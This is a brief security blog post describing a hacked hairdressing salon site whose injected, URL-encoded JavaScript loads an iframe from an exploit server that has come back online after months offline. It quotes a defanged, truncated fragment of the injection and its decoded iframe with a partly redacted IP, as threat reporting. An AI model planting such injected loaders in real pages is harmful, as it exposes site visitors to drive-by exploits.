An orphan no longer
One of the more interesting ideas that we monitor is that of an Orphaned Lure. That's where you have some site that has been hacked, and made into an Innocent Lure, but then the exploit server is offline. The Lure is now an orphan, but in a macabre parody of a B-grade horror movie the exploit serves can come back to life, and start serving exploits again.
This has happened tonight.
One of the common hacks that we see is an injection of some unescaped code that starts like this ...
< s c ript language="j a vascript"> document.write( unescape( '%3C%69%66%72%61%6D etc
When you decrypt this, it resolves to something like this ...
< iframe src=hxxp:// 81.95.nnn.nn/index.html
where nnn.nn is a substitute to save people from accidently hurting themselves.
This ip has been offline for at least a month, maybe two, but tonight it is live again, and serving stuff.
The moral of the story is that you cannot trust a hacked site. The lure in this case is a hairdressing salon.